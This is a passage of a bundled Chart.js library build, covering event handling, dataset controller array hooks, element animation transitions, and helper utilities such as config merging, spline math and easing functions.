return this.chart.canvas.toDataURL.apply(this.chart.canvas, arguments);
},
initToolTip: function () {
var me = this;
me.tooltip = new Chart.Tooltip({
_chart: me.chart,
_chartInstance: me,
_data: me.data,
_options: me.options.tooltips
}, me);
me.tooltip.initialize();
},
bindEvents: function () {
var me = this;
helpers.bindEvents(me, me.options.events, function (evt) {
me.eventHandler(evt);
});
},
updateHoverStyle: function (elements, mode, enabled) {
var method = enabled ? 'setHoverStyle' : 'removeHoverStyle';
var element, i, ilen;
for (i = 0, ilen = elements.length; i < ilen; ++i) {
element = elements[i];
if (element) {
this.getDatasetMeta(element._datasetIndex).controller[method](element);
}
}
},
eventHandler: function (e) {
var me = this;
var legend = me.legend;
var tooltip = me.tooltip;
var hoverOptions = me.options.hover;
// Buffer any update calls so that renders do not occur
me._bufferedRender = true;
me._bufferedRequest = null;
var changed = me.handleEvent(e);
changed |= legend && legend.handleEvent(e);
changed |= tooltip && tooltip.handleEvent(e);
var bufferedRequest = me._bufferedRequest;
if (bufferedRequest) {
// If we have an update that was triggered, we need to do a normal render
me.render(bufferedRequest.duration, bufferedRequest.lazy);
} else if (changed && !me.animating) {
// If entering, leaving, or changing elements, animate the change via pivot
me.stop();
// We only need to render at this point. Updating will cause scales to be
// recomputed, generating flicker and using more memory than necessary.
me.render(hoverOptions.animationDuration, true);
}
me._bufferedRender = false;
me._bufferedRequest = null;
return me;
},
/**
* Handle an event
* @private
* @param e {Event} the event to handle
* @return {Boolean} true if the chart needs to re-render
*/
handleEvent: function (e) {
var me = this;
var options = me.options || {};
var hoverOptions = options.hover;
var changed = false;
me.lastActive = me.lastActive || [];
// Find Active Elements for hover and tooltips
if (e.type === 'mouseout') {
me.active = [];
} else {
me.active = me.getElementsAtEventForMode(e, hoverOptions.mode, hoverOptions);
}
// On Hover hook
if (hoverOptions.onHover) {
hoverOptions.onHover.call(me, me.active);
}
if (e.type === 'mouseup' || e.type === 'click') {
if (options.onClick) {
options.onClick.call(me, e, me.active);
}
}
// Remove styling for last active (even if it may still be active)
if (me.lastActive.length) {
me.updateHoverStyle(me.lastActive, hoverOptions.mode, false);
}
// Built in hover styling
if (me.active.length && hoverOptions.mode) {
me.updateHoverStyle(me.active, hoverOptions.mode, true);
}
changed = !helpers.arrayEquals(me.active, me.lastActive);
// Remember Last Actives
me.lastActive = me.active;
return changed;
}
});
};
}, {}], 24: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
var arrayEvents = ['push', 'pop', 'shift', 'splice', 'unshift'];
/**
* Hooks the array methods that add or remove values ('push', 'pop', 'shift', 'splice',
* 'unshift') and notifies the listener AFTER the array has been altered. Listeners are
* called on the 'onData*' callbacks (e.g. onDataPush, etc.) with the same arguments.
*/
function listenArrayEvents(array, listener) {
if (array._chartjs) {
array._chartjs.listeners.push(listener);
return;
}
Object.defineProperty(array, '_chartjs', {
configurable: true,
enumerable: false,
value: {
listeners: [listener]
}
});
arrayEvents.forEach(function (key) {
var method = 'onData' + key.charAt(0).toUpperCase() + key.slice(1);
var base = array[key];
Object.defineProperty(array, key, {
configurable: true,
enumerable: false,
value: function () {
var args = Array.prototype.slice.call(arguments);
var res = base.apply(this, args);
helpers.each(array._chartjs.listeners, function (object) {
if (typeof object[method] === 'function') {
object[method].apply(object, args);
}
});
return res;
}
});
});
}
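// Example (illustrative): once listenArrayEvents(dataset.data, controller) has
// run, a plain array mutation like dataset.data.push(42) still returns the new
// length, but also calls controller.onDataPush(42) after the array is altered,
// which is how the controller keeps its meta elements in sync in real time.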
/**
* Removes the given array event listener and cleans up extra attached properties (such as
* the _chartjs stub and overridden methods) if the array doesn't have any more listeners.
*/
function unlistenArrayEvents(array, listener) {
var stub = array._chartjs;
if (!stub) {
return;
}
var listeners = stub.listeners;
var index = listeners.indexOf(listener);
if (index !== -1) {
listeners.splice(index, 1);
}
if (listeners.length > 0) {
return;
}
arrayEvents.forEach(function (key) {
delete array[key];
});
delete array._chartjs;
}
// Base class for all dataset controllers (line, bar, etc)
Chart.DatasetController = function (chart, datasetIndex) {
this.initialize(chart, datasetIndex);
};
helpers.extend(Chart.DatasetController.prototype, {
/**
* Element type used to generate a meta dataset (e.g. Chart.elements.Line).
* @type {Chart.core.element}
*/
datasetElementType: null,
/**
* Element type used to generate meta data elements (e.g. Chart.elements.Point).
* @type {Chart.core.element}
*/
dataElementType: null,
initialize: function (chart, datasetIndex) {
var me = this;
me.chart = chart;
me.index = datasetIndex;
me.linkScales();
me.addElements();
},
updateIndex: function (datasetIndex) {
this.index = datasetIndex;
},
linkScales: function () {
var me = this;
var meta = me.getMeta();
var dataset = me.getDataset();
if (meta.xAxisID === null) {
meta.xAxisID = dataset.xAxisID || me.chart.options.scales.xAxes[0].id;
}
if (meta.yAxisID === null) {
meta.yAxisID = dataset.yAxisID || me.chart.options.scales.yAxes[0].id;
}
},
getDataset: function () {
return this.chart.data.datasets[this.index];
},
getMeta: function () {
return this.chart.getDatasetMeta(this.index);
},
getScaleForId: function (scaleID) {
return this.chart.scales[scaleID];
},
reset: function () {
this.update(true);
},
/**
* @private
*/
destroy: function () {
if (this._data) {
unlistenArrayEvents(this._data, this);
}
},
createMetaDataset: function () {
var me = this;
var type = me.datasetElementType;
return type && new type({
_chart: me.chart.chart,
_datasetIndex: me.index
});
},
createMetaData: function (index) {
var me = this;
var type = me.dataElementType;
return type && new type({
_chart: me.chart.chart,
_datasetIndex: me.index,
_index: index
});
},
addElements: function () {
var me = this;
var meta = me.getMeta();
var data = me.getDataset().data || [];
var metaData = meta.data;
var i, ilen;
for (i = 0, ilen = data.length; i < ilen; ++i) {
metaData[i] = metaData[i] || me.createMetaData(i);
}
meta.dataset = meta.dataset || me.createMetaDataset();
},
addElementAndReset: function (index) {
var element = this.createMetaData(index);
this.getMeta().data.splice(index, 0, element);
this.updateElement(element, index, true);
},
buildOrUpdateElements: function () {
var me = this;
var dataset = me.getDataset();
var data = dataset.data || (dataset.data = []);
// In order to correctly handle data addition/deletion animation (and thus simulate
// real-time charts), we need to monitor these data modifications and synchronize
// the internal meta data accordingly.
if (me._data !== data) {
if (me._data) {
// This case happens when the user replaced the data array instance.
unlistenArrayEvents(me._data, me);
}
listenArrayEvents(data, me);
me._data = data;
}
// Re-sync meta data in case the user replaced the data array, or in case we missed
// any updates, so that changes in the number of data points are handled.
me.resyncElements();
},
update: helpers.noop,
draw: function (ease) {
var easingDecimal = ease || 1;
var i, len;
var metaData = this.getMeta().data;
for (i = 0, len = metaData.length; i < len; ++i) {
metaData[i].transition(easingDecimal).draw();
}
},
removeHoverStyle: function (element, elementOpts) {
var dataset = this.chart.data.datasets[element._datasetIndex],
index = element._index,
custom = element.custom || {},
valueOrDefault = helpers.getValueAtIndexOrDefault,
model = element._model;
model.backgroundColor = custom.backgroundColor ? custom.backgroundColor : valueOrDefault(dataset.backgroundColor, index, elementOpts.backgroundColor);
model.borderColor = custom.borderColor ? custom.borderColor : valueOrDefault(dataset.borderColor, index, elementOpts.borderColor);
model.borderWidth = custom.borderWidth ? custom.borderWidth : valueOrDefault(dataset.borderWidth, index, elementOpts.borderWidth);
},
setHoverStyle: function (element) {
var dataset = this.chart.data.datasets[element._datasetIndex],
index = element._index,
custom = element.custom || {},
valueOrDefault = helpers.getValueAtIndexOrDefault,
getHoverColor = helpers.getHoverColor,
model = element._model;
model.backgroundColor = custom.hoverBackgroundColor ? custom.hoverBackgroundColor : valueOrDefault(dataset.hoverBackgroundColor, index, getHoverColor(model.backgroundColor));
model.borderColor = custom.hoverBorderColor ? custom.hoverBorderColor : valueOrDefault(dataset.hoverBorderColor, index, getHoverColor(model.borderColor));
model.borderWidth = custom.hoverBorderWidth ? custom.hoverBorderWidth : valueOrDefault(dataset.hoverBorderWidth, index, model.borderWidth);
},
/**
* @private
*/
resyncElements: function () {
var me = this;
var meta = me.getMeta();
var data = me.getDataset().data;
var numMeta = meta.data.length;
var numData = data.length;
if (numData < numMeta) {
meta.data.splice(numData, numMeta - numData);
} else if (numData > numMeta) {
me.insertElements(numMeta, numData - numMeta);
}
},
/**
* @private
*/
insertElements: function (start, count) {
for (var i = 0; i < count; ++i) {
this.addElementAndReset(start + i);
}
},
/**
* @private
*/
onDataPush: function () {
this.insertElements(this.getDataset().data.length - 1, arguments.length);
},
/**
* @private
*/
onDataPop: function () {
this.getMeta().data.pop();
},
/**
* @private
*/
onDataShift: function () {
this.getMeta().data.shift();
},
/**
* @private
*/
onDataSplice: function (start, count) {
this.getMeta().data.splice(start, count);
this.insertElements(start, arguments.length - 2);
},
/**
* @private
*/
onDataUnshift: function () {
this.insertElements(0, arguments.length);
}
});
Chart.DatasetController.extend = helpers.inherits;
};
}, {}], 25: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.elements = {};
Chart.Element = function (configuration) {
helpers.extend(this, configuration);
this.initialize.apply(this, arguments);
};
helpers.extend(Chart.Element.prototype, {
initialize: function () {
this.hidden = false;
},
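// Snapshot the current view state into _start so the next transition animates from it.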
pivot: function () {
var me = this;
if (!me._view) {
me._view = helpers.clone(me._model);
}
me._start = helpers.clone(me._view);
return me;
},
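// Interpolate _view between _start and _model by ease (0..1); ease === 1 snaps _view straight to the model.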
transition: function (ease) {
var me = this;
if (!me._view) {
me._view = helpers.clone(me._model);
}
// No animation -> No Transition
if (ease === 1) {
me._view = me._model;
me._start = null;
return me;
}
if (!me._start) {
me.pivot();
}
helpers.each(me._model, function (value, key) {
if (key[0] === '_') {
// Only non-underscored properties
// Init if doesn't exist
} else if (!me._view.hasOwnProperty(key)) {
if (typeof value === 'number' && !isNaN(me._view[key])) {
me._view[key] = value * ease;
} else {
me._view[key] = value;
}
// No unnecessary computations
} else if (value === me._view[key]) {
// It's the same! Woohoo!
// Color transitions if possible
} else if (typeof value === 'string') {
try {
var color = helpers.color(me._model[key]).mix(helpers.color(me._start[key]), ease);
me._view[key] = color.rgbString();
} catch (err) {
me._view[key] = value;
}
// Number transitions
} else if (typeof value === 'number') {
var startVal = me._start[key] !== undefined && isNaN(me._start[key]) === false ? me._start[key] : 0;
me._view[key] = ((me._model[key] - startVal) * ease) + startVal;
// Everything else
} else {
me._view[key] = value;
}
}, me);
return me;
},
tooltipPosition: function () {
return {
x: this._model.x,
y: this._model.y
};
},
hasValue: function () {
return helpers.isNumber(this._model.x) && helpers.isNumber(this._model.y);
}
});
Chart.Element.extend = helpers.inherits;
};
}, {}], 26: [function (require, module, exports) {
/* global window: false */
/* global document: false */
'use strict';
var color = require(3);
module.exports = function (Chart) {
// Global Chart helpers object for utility methods and classes
var helpers = Chart.helpers = {};
// -- Basic js utility methods
helpers.each = function (loopable, callback, self, reverse) {
// Guard against null/undefined: isArray() rejects them and the object branch below checks explicitly.
var i, len;
if (helpers.isArray(loopable)) {
len = loopable.length;
if (reverse) {
for (i = len - 1; i >= 0; i--) {
callback.call(self, loopable[i], i);
}
} else {
for (i = 0; i < len; i++) {
callback.call(self, loopable[i], i);
}
}
} else if (loopable !== null && typeof loopable === 'object') {
var keys = Object.keys(loopable);
len = keys.length;
for (i = 0; i < len; i++) {
callback.call(self, loopable[keys[i]], keys[i]);
}
}
};
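// Deep-clone a plain object: arrays are sliced, nested objects are cloned recursively, primitives copied as-is.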
helpers.clone = function (obj) {
var objClone = {};
helpers.each(obj, function (value, key) {
if (helpers.isArray(value)) {
objClone[key] = value.slice(0);
} else if (typeof value === 'object' && value !== null) {
objClone[key] = helpers.clone(value);
} else {
objClone[key] = value;
}
});
return objClone;
};
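// Shallow-copy the own enumerable properties of each source argument onto base and return it.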
helpers.extend = function (base) {
var setFn = function (value, key) {
base[key] = value;
};
for (var i = 1, ilen = arguments.length; i < ilen; i++) {
helpers.each(arguments[i], setFn);
}
return base;
};
// Need a special merge function for chart configs since they are now grouped
helpers.configMerge = function (_base) {
var base = helpers.clone(_base);
helpers.each(Array.prototype.slice.call(arguments, 1), function (extension) {
helpers.each(extension, function (value, key) {
var baseHasProperty = base.hasOwnProperty(key);
var baseVal = baseHasProperty ? base[key] : {};
if (key === 'scales') {
// Scale config merging is complex. Add our own function here for that
base[key] = helpers.scaleMerge(baseVal, value);
} else if (key === 'scale') {
// Used in polar area & radar charts since there is only one scale
base[key] = helpers.configMerge(baseVal, Chart.scaleService.getScaleDefaults(value.type), value);
} else if (baseHasProperty
&& typeof baseVal === 'object'
&& !helpers.isArray(baseVal)
&& baseVal !== null
&& typeof value === 'object'
&& !helpers.isArray(value)) {
// If we are overwriting an object with an object, do a merge of the properties.
base[key] = helpers.configMerge(baseVal, value);
} else {
// can just overwrite the value in this case
base[key] = value;
}
});
});
return base;
};
helpers.scaleMerge = function (_base, extension) {
var base = helpers.clone(_base);
helpers.each(extension, function (value, key) {
if (key === 'xAxes' || key === 'yAxes') {
// These properties are arrays of items
if (base.hasOwnProperty(key)) {
helpers.each(value, function (valueObj, index) {
var axisType = helpers.getValueOrDefault(valueObj.type, key === 'xAxes' ? 'category' : 'linear');
var axisDefaults = Chart.scaleService.getScaleDefaults(axisType);
if (index >= base[key].length || !base[key][index].type) {
base[key].push(helpers.configMerge(axisDefaults, valueObj));
} else if (valueObj.type && valueObj.type !== base[key][index].type) {
// Type changed. Bring in the new defaults before we bring in valueObj so that valueObj can override the correct scale defaults
base[key][index] = helpers.configMerge(base[key][index], axisDefaults, valueObj);
} else {
// Type is the same
base[key][index] = helpers.configMerge(base[key][index], valueObj);
}
});
} else {
base[key] = [];
helpers.each(value, function (valueObj) {
var axisType = helpers.getValueOrDefault(valueObj.type, key === 'xAxes' ? 'category' : 'linear');
base[key].push(helpers.configMerge(Chart.scaleService.getScaleDefaults(axisType), valueObj));
});
}
} else if (base.hasOwnProperty(key) && typeof base[key] === 'object' && base[key] !== null && typeof value === 'object') {
// If we are overwriting an object with an object, do a merge of the properties.
base[key] = helpers.configMerge(base[key], value);
} else {
// can just overwrite the value in this case
base[key] = value;
}
});
return base;
};
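// Resolve an option that may be indexable: arrays are read at index (falling back when out of
// range), null/undefined fall back to the default, and scalars are returned as-is.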
helpers.getValueAtIndexOrDefault = function (value, index, defaultValue) {
if (value === undefined || value === null) {
return defaultValue;
}
if (helpers.isArray(value)) {
return index < value.length ? value[index] : defaultValue;
}
return value;
};
helpers.getValueOrDefault = function (value, defaultValue) {
return value === undefined ? defaultValue : value;
};
helpers.indexOf = Array.prototype.indexOf ?
function (array, item) {
return array.indexOf(item);
} :
function (array, item) {
for (var i = 0, ilen = array.length; i < ilen; ++i) {
if (array[i] === item) {
return i;
}
}
return -1;
};
helpers.where = function (collection, filterCallback) {
if (helpers.isArray(collection) && Array.prototype.filter) {
return collection.filter(filterCallback);
}
var filtered = [];
helpers.each(collection, function (item) {
if (filterCallback(item)) {
filtered.push(item);
}
});
return filtered;
};
helpers.findIndex = Array.prototype.findIndex ?
function (array, callback, scope) {
return array.findIndex(callback, scope);
} :
function (array, callback, scope) {
scope = scope === undefined ? array : scope;
for (var i = 0, ilen = array.length; i < ilen; ++i) {
if (callback.call(scope, array[i], i, array)) {
return i;
}
}
return -1;
};
helpers.findNextWhere = function (arrayToSearch, filterCallback, startIndex) {
// Default to start of the array
if (startIndex === undefined || startIndex === null) {
startIndex = -1;
}
for (var i = startIndex + 1; i < arrayToSearch.length; i++) {
var currentItem = arrayToSearch[i];
if (filterCallback(currentItem)) {
return currentItem;
}
}
};
helpers.findPreviousWhere = function (arrayToSearch, filterCallback, startIndex) {
// Default to end of the array
if (startIndex === undefined || startIndex === null) {
startIndex = arrayToSearch.length;
}
for (var i = startIndex - 1; i >= 0; i--) {
var currentItem = arrayToSearch[i];
if (filterCallback(currentItem)) {
return currentItem;
}
}
};
helpers.inherits = function (extensions) {
// Basic javascript inheritance based on the model created in Backbone.js
var me = this;
var ChartElement = (extensions && extensions.hasOwnProperty('constructor')) ? extensions.constructor : function () {
return me.apply(this, arguments);
};
var Surrogate = function () {
this.constructor = ChartElement;
};
Surrogate.prototype = me.prototype;
ChartElement.prototype = new Surrogate();
ChartElement.extend = helpers.inherits;
if (extensions) {
helpers.extend(ChartElement.prototype, extensions);
}
ChartElement.__super__ = me.prototype;
return ChartElement;
};
helpers.noop = function () {
};
helpers.uid = (function () {
var id = 0;
return function () {
return id++;
};
}());
// -- Math methods
helpers.isNumber = function (n) {
return !isNaN(parseFloat(n)) && isFinite(n);
};
helpers.almostEquals = function (x, y, epsilon) {
return Math.abs(x - y) < epsilon;
};
helpers.max = function (array) {
return array.reduce(function (max, value) {
if (!isNaN(value)) {
return Math.max(max, value);
}
return max;
}, Number.NEGATIVE_INFINITY);
};
helpers.min = function (array) {
return array.reduce(function (min, value) {
if (!isNaN(value)) {
return Math.min(min, value);
}
return min;
}, Number.POSITIVE_INFINITY);
};
helpers.sign = Math.sign ?
function (x) {
return Math.sign(x);
} :
function (x) {
x = +x; // convert to a number
if (x === 0 || isNaN(x)) {
return x;
}
return x > 0 ? 1 : -1;
};
helpers.log10 = Math.log10 ?
function (x) {
return Math.log10(x);
} :
function (x) {
return Math.log(x) / Math.LN10;
};
helpers.toRadians = function (degrees) {
return degrees * (Math.PI / 180);
};
helpers.toDegrees = function (radians) {
return radians * (180 / Math.PI);
};
// Gets the angle (measured from the positive x-axis) and distance of a point about a centre.
helpers.getAngleFromPoint = function (centrePoint, anglePoint) {
var distanceFromXCenter = anglePoint.x - centrePoint.x,
distanceFromYCenter = anglePoint.y - centrePoint.y,
radialDistanceFromCenter = Math.sqrt(distanceFromXCenter * distanceFromXCenter + distanceFromYCenter * distanceFromYCenter);
var angle = Math.atan2(distanceFromYCenter, distanceFromXCenter);
if (angle < (-0.5 * Math.PI)) {
angle += 2.0 * Math.PI; // make sure the returned angle is in the range of (-PI/2, 3PI/2]
}
return {
angle: angle,
distance: radialDistanceFromCenter
};
};
helpers.distanceBetweenPoints = function (pt1, pt2) {
return Math.sqrt(Math.pow(pt2.x - pt1.x, 2) + Math.pow(pt2.y - pt1.y, 2));
};
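// Half-pixel offset that keeps odd-width canvas strokes crisp; even widths need no offset.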
helpers.aliasPixel = function (pixelWidth) {
return (pixelWidth % 2 === 0) ? 0 : 0.5;
};
helpers.splineCurve = function (firstPoint, middlePoint, afterPoint, t) {
// Props to Rob Spencer at scaled innovation for his post on splining between points
// http://scaledinnovation.com/analytics/splines/aboutSplines.html
// This function must also respect "skipped" points
var previous = firstPoint.skip ? middlePoint : firstPoint,
current = middlePoint,
next = afterPoint.skip ? middlePoint : afterPoint;
var d01 = Math.sqrt(Math.pow(current.x - previous.x, 2) + Math.pow(current.y - previous.y, 2));
var d12 = Math.sqrt(Math.pow(next.x - current.x, 2) + Math.pow(next.y - current.y, 2));
var s01 = d01 / (d01 + d12);
var s12 = d12 / (d01 + d12);
// If both distances are zero (all points coincide), s01 & s12 will be NaN
s01 = isNaN(s01) ? 0 : s01;
s12 = isNaN(s12) ? 0 : s12;
var fa = t * s01; // scaling factor for triangle Ta
var fb = t * s12;
return {
previous: {
x: current.x - fa * (next.x - previous.x),
y: current.y - fa * (next.y - previous.y)
},
next: {
x: current.x + fb * (next.x - previous.x),
y: current.y + fb * (next.y - previous.y)
}
};
};
helpers.EPSILON = Number.EPSILON || 1e-14;
helpers.splineCurveMonotone = function (points) {
// This function calculates Bézier control points in a similar way than |splineCurve|,
// but preserves monotonicity of the provided data and ensures no local extremums are added
// between the dataset discrete points due to the interpolation.
// See : https://en.wikipedia.org/wiki/Monotone_cubic_interpolation
var pointsWithTangents = (points || []).map(function (point) {
return {
model: point._model,
deltaK: 0,
mK: 0
};
});
// Calculate slopes (deltaK) and initialize tangents (mK)
var pointsLen = pointsWithTangents.length;
var i, pointBefore, pointCurrent, pointAfter;
for (i = 0; i < pointsLen; ++i) {
pointCurrent = pointsWithTangents[i];
if (pointCurrent.model.skip) {
continue;
}
pointBefore = i > 0 ? pointsWithTangents[i - 1] : null;
pointAfter = i < pointsLen - 1 ? pointsWithTangents[i + 1] : null;
if (pointAfter && !pointAfter.model.skip) {
pointCurrent.deltaK = (pointAfter.model.y - pointCurrent.model.y) / (pointAfter.model.x - pointCurrent.model.x);
}
if (!pointBefore || pointBefore.model.skip) {
pointCurrent.mK = pointCurrent.deltaK;
} else if (!pointAfter || pointAfter.model.skip) {
pointCurrent.mK = pointBefore.deltaK;
} else if (this.sign(pointBefore.deltaK) !== this.sign(pointCurrent.deltaK)) {
pointCurrent.mK = 0;
} else {
pointCurrent.mK = (pointBefore.deltaK + pointCurrent.deltaK) / 2;
}
}
// Adjust tangents to ensure monotonic properties
var alphaK, betaK, tauK, squaredMagnitude;
for (i = 0; i < pointsLen - 1; ++i) {
pointCurrent = pointsWithTangents[i];
pointAfter = pointsWithTangents[i + 1];
if (pointCurrent.model.skip || pointAfter.model.skip) {
continue;
}
if (helpers.almostEquals(pointCurrent.deltaK, 0, this.EPSILON)) {
pointCurrent.mK = pointAfter.mK = 0;
continue;
}
alphaK = pointCurrent.mK / pointCurrent.deltaK;
betaK = pointAfter.mK / pointCurrent.deltaK;
squaredMagnitude = Math.pow(alphaK, 2) + Math.pow(betaK, 2);
if (squaredMagnitude <= 9) {
continue;
}
tauK = 3 / Math.sqrt(squaredMagnitude);
pointCurrent.mK = alphaK * tauK * pointCurrent.deltaK;
pointAfter.mK = betaK * tauK * pointCurrent.deltaK;
}
// Compute control points
var deltaX;
for (i = 0; i < pointsLen; ++i) {
pointCurrent = pointsWithTangents[i];
if (pointCurrent.model.skip) {
continue;
}
pointBefore = i > 0 ? pointsWithTangents[i - 1] : null;
pointAfter = i < pointsLen - 1 ? pointsWithTangents[i + 1] : null;
if (pointBefore && !pointBefore.model.skip) {
deltaX = (pointCurrent.model.x - pointBefore.model.x) / 3;
pointCurrent.model.controlPointPreviousX = pointCurrent.model.x - deltaX;
pointCurrent.model.controlPointPreviousY = pointCurrent.model.y - deltaX * pointCurrent.mK;
}
if (pointAfter && !pointAfter.model.skip) {
deltaX = (pointAfter.model.x - pointCurrent.model.x) / 3;
pointCurrent.model.controlPointNextX = pointCurrent.model.x + deltaX;
pointCurrent.model.controlPointNextY = pointCurrent.model.y + deltaX * pointCurrent.mK;
}
}
};
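// Collection navigation helpers: with loop set, stepping past either end wraps around; otherwise it clamps.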
helpers.nextItem = function (collection, index, loop) {
if (loop) {
return index >= collection.length - 1 ? collection[0] : collection[index + 1];
}
return index >= collection.length - 1 ? collection[collection.length - 1] : collection[index + 1];
};
helpers.previousItem = function (collection, index, loop) {
if (loop) {
return index <= 0 ? collection[collection.length - 1] : collection[index - 1];
}
return index <= 0 ? collection[0] : collection[index - 1];
};
// Implementation of the nice number algorithm used in determining where axis labels will go
helpers.niceNum = function (range, round) {
var exponent = Math.floor(helpers.log10(range));
var fraction = range / Math.pow(10, exponent);
var niceFraction;
if (round) {
if (fraction < 1.5) {
niceFraction = 1;
} else if (fraction < 3) {
niceFraction = 2;
} else if (fraction < 7) {
niceFraction = 5;
} else {
niceFraction = 10;
}
} else if (fraction <= 1.0) {
niceFraction = 1;
} else if (fraction <= 2) {
niceFraction = 2;
} else if (fraction <= 5) {
niceFraction = 5;
} else {
niceFraction = 10;
}
return niceFraction * Math.pow(10, exponent);
};
// Easing functions adapted from Robert Penner's easing equations
// http://www.robertpenner.com/easing/
var easingEffects = helpers.easingEffects = {
linear: function (t) {
return t;
},
easeInQuad: function (t) {
return t * t;
},
easeOutQuad: function (t) {
return -1 * t * (t - 2);
},
easeInOutQuad: function (t) {
if ((t /= 1 / 2) < 1) {
return 1 / 2 * t * t;
}
return -1 / 2 * ((--t) * (t - 2) - 1);
},
easeInCubic: function (t) {
return t * t * t;
},
easeOutCubic: function (t) {
return 1 * ((t = t / 1 - 1) * t * t + 1);
},
easeInOutCubic: function (t) {
if ((t /= 1 / 2) < 1) {
return 1 / 2 * t * t * t;
}
return 1 / 2 * ((t -= 2) * t * t + 2);
},
easeInQuart: function (t) {
return t * t * t * t;
},
easeOutQuart: function (t) {
return -1 * ((t = t / 1 - 1) * t * t * t - 1);
},
easeInOutQuart: function (t) {
if ((t /= 1 / 2) < 1) {
return 1 / 2 * t * t * t * t;
}
return -1 / 2 * ((t -= 2) * t * t * t - 2);
},
easeInQuint: function (t) {
return 1 * (t /= 1) * t * t * t * t;
},
easeOutQuint: function (t) {
return 1 * ((t = t / 1 - 1) * t * t * t * t + 1);
},
easeInOutQuint: function (t) {
if ((t /= 1 / 2) < 1) {
return 1 / 2 * t * t * t * t * t;
}
return 1 / 2 * ((t -= 2) * t * t * t * t + 2);
},
easeInSine: function (t) {
return -1 * Math.cos(t / 1 * (Math.PI / 2)) + 1;
},
easeOutSine: function (t) {
return 1 * Math.sin(t / 1 * (Math.PI / 2));
},
easeInOutSine: function (t) {
return -1 / 2 * (Math.cos(Math.PI * t / 1) - 1);
},
easeInExpo: function (t) {
return (t === 0) ? 1 : 1 * Math.pow(2, 10 * (t / 1 - 1));
},
easeOutExpo: function (t) {
return (t === 1) ? 1 : 1 * (-Math.pow(2, -10 * t / 1) + 1);
},
easeInOutExpo: function (t) {
if (t === 0) {
return 0;
}
if (t === 1) {
return 1;
}
if ((t /= 1 / 2) < 1) {
return 1 / 2 * Math.pow(2, 10 * (t - 1));
}
return 1 / 2 * (-Math.pow(2, -10 * --t) + 2);
},
easeInCirc: function (t) {
if (t >= 1) {
return t;
}
return -1 * (Math.sqrt(1 - (t /= 1) * t) - 1);
},
easeOutCirc: function (t) {
return 1 * Math.sqrt(1 - (t = t / 1 - 1) * t);
},
easeInOutCirc: function (t) {
if ((t /= 1 / 2) < 1) {
return -1 / 2 * (Math.sqrt(1 - t * t) - 1);
}
return 1 / 2 * (Math.sqrt(1 - (t -= 2) * t) + 1);
},
easeInElastic: function (t) {
var s = 1.70158;
var p = 0;
var a = 1;
if (t === 0) {
return 0;
}
if ((t /= 1) === 1) {
return 1;
}
if (!p) {
p = 1 * 0.3;
}
if (a < Math.abs(1)) {
a = 1;
s = p / 4;
} else {
s = p / (2 * Math.PI) * Math.asin(1 / a);
}
return -(a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * 1 - s) * (2 * Math.PI) / p));
},
easeOutElastic: function (t) {
var s = 1.70158;
var p = 0;
var a = 1;
if (t === 0) {
return 0;
}
if ((t /= 1) === 1) {
return 1;
}
if (!p) {
p = 1 * 0.3;
}
if (a < Math.abs(1)) {
a = 1;
s = p / 4;
} else {
s = p / (2 * Math.PI) * Math.asin(1 / a);
}
return a * Math.pow(2, -10 * t) * Math.sin((t * 1 - s) * (2 * Math.PI) / p) + 1;
},
easeInOutElastic: function (t) {
var s = 1.70158;
var p = 0;
var a = 1;
if (t === 0) {
return 0;
}
if ((t /= 1 / 2) === 2) {
return 1;
}
if (!p) {
p = 1 * (0.3 * 1.5);
}
if (a < Math.abs(1)) {
a = 1;
s = p / 4;
} else {
s = p / (2 * Math.PI) * Math.asin(1 / a);
}
if (t < 1) {
return -0.5 * (a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * 1 - s) * (2 * Math.PI) / p));
}
return a * Math.pow(2, -10 * (t -= 1)) * Math.sin((t * 1 - s) * (2 * Math.PI) / p) * 0.5 + 1;
},
easeInBack: function (t) {
var s = 1.70158;
return 1 * (t /= 1) * t * ((s + 1) * t - s);
},
easeOutBack: function (t) {
var s = 1.70158;
return 1 * ((t = t / 1 - 1) * t * ((s + 1) * t + s) + 1);
},
easeInOutBack: function (t) {
var s = 1.70158;
if ((t /= 1 / 2) < 1) {
return 1 / 2 * (t * t * (((s *= (1.525)) + 1) * t - s));
}
return 1 / 2 * ((t -= 2) * t * (((s *= (1.525)) + 1) * t + s) + 2);
},
easeInBounce: function (t) {
return 1 - easingEffects.easeOutBounce(1 - t);
},
easeOutBounce: function (t) {
if ((t /= 1) < (1 / 2.75)) {
return 1 * (7.5625 * t * t);
} else if (t < (2 / 2.75)) {
return 1 * (7.5625 * (t -= (1.5 / 2.75)) * t + 0.75);
} else if (t < (2.5 / 2.75)) {
return 1 * (7.5625 * (t -= (2.25 / 2.75)) * t + 0.9375);
}
return 1 * (7.5625 * (t -= (2.625 / 2.75)) * t + 0.984375);
},
easeInOutBounce: function (t) {
if (t < 1 / 2) {
return easingEffects.easeInBounce(t * 2) * 0.5;
}
return easingEffects.easeOutBounce(t * 2 - 1) * 0.5 + 1 * 0.5;
}
};
// Request animation polyfill - http://www.paulirish.com/2011/requestanimationframe-for-smart-animating/
helpers.requestAnimFrame = (function () {
return window.requestAnimationFrame ||
window.webkitRequestAnimationFrame ||
window.mozRequestAnimationFrame ||
window.oRequestAnimationFrame ||
window.msRequestAnimationFrame ||
function (callback) {
return window.setTimeout(callback, 1000 / 60);
};
}());
helpers.cancelAnimFrame = (function () {
return window.cancelAnimationFrame ||
window.webkitCancelAnimationFrame ||
window.mozCancelAnimationFrame ||
window.oCancelAnimationFrame ||
window.msCancelAnimationFrame ||
function (callback) {
return window.clearTimeout(callback);
};
}());
// -- DOM methods
helpers.getRelativePosition = function (evt, chart) {
var mouseX, mouseY;
var e = evt.originalEvent || evt,
canvas = evt.currentTarget || evt.srcElement,
boundingRect = canvas.getBoundingClientRect();
var touches = e.touches;
if (touches && touches.length > 0) {
mouseX = touches[0].clientX;
mouseY = touches[0].clientY;
} else {
mouseX = e.clientX;
mouseY = e.clientY;
}
// Scale mouse coordinates into canvas coordinates
// by following the pattern laid out by 'jerryj' in the comments of
// http://www.html5canvastutorials.com/advanced/html5-canvas-mouse-coordinates/
var paddingLeft = parseFloat(helpers.getStyle(canvas, 'padding-left'));
var paddingTop = parseFloat(helpers.getStyle(canvas, 'padding-top'));
var paddingRight = parseFloat(helpers.getStyle(canvas, 'padding-right'));
var paddingBottom = parseFloat(helpers.getStyle(canvas, 'padding-bottom'));
